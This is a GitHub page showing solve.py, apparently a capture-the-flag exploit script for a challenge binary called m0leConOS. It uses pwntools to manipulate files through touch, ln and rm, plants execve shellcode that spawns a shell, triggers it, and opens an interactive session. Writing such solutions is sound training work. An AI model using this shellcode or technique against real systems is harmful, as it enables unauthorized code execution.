-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsolve.py
38 lines (25 loc) · 862 Bytes
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
import re
prompt = b"# "
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
if args.LOCAL:
conn = process("./dist/m0leConOS")
else:
conn = remote("localhost", 6745)
conn.sendlineafter(prompt, b"touch")
conn.sendlineafter(b"name: ", b"tmp")
conn.sendlineafter(b"> ", b"junk1")
conn.sendlineafter(prompt, b"ln")
conn.sendlineafter(b"from: ", b"m0lecat")
conn.sendlineafter(b"to: ", b"tmp2")
conn.sendlineafter(prompt, b"rm")
conn.sendlineafter(b"name: ", b"tmp")
conn.sendlineafter(prompt, b"rm")
conn.sendlineafter(b"name: ", b"tmp2")
conn.sendlineafter(prompt, b"touch")
conn.sendlineafter(b"name: ", b"tmp")
conn.sendlineafter(b"> ", shellcode)
conn.sendlineafter(prompt, b"m0lecat")
conn.recvuntil(b"\n> ")
conn.sendline(b"tmp")
conn.interactive()